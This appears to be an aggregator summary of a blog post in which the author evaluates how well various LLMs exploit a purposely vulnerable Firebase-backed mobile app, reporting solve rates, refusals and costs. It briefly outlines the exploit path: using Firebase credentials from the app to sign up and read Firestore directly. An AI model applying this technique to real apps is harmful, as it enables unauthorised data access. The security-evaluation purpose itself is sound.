Hasty Briefsbeta

Bilingual

I built a vulnerable app and spent $1,500 seeing if LLMs could hack it

3 hours ago
  • #Firebase Exploit
  • #AI Evaluation
  • #LLM Security Testing
  • The author built a vulnerable React Native Expo app with a Python FastAPI backend and Firebase to test if LLMs could exploit common security flaws.
  • The exploit involved using Firebase credentials from the app to directly sign up and read Firestore, bypassing a secure API—a common real-world issue.
  • GPT-5.5 had the highest solve rate (7/10), focusing quickly on Firebase, while other models like Deepseek V4 Pro (3/10) and Claude variants (2/10) had lower success.
  • Several models (e.g., Gemini 3.1 Pro Preview, Deepseek V4 Flash) failed due to refusals or misdirected efforts, with some fixating on API exploits instead of Firebase.
  • The experiment cost $1,500, revealing challenges like model guardrails, high costs for some providers, and technical hurdles in running the evaluation harness.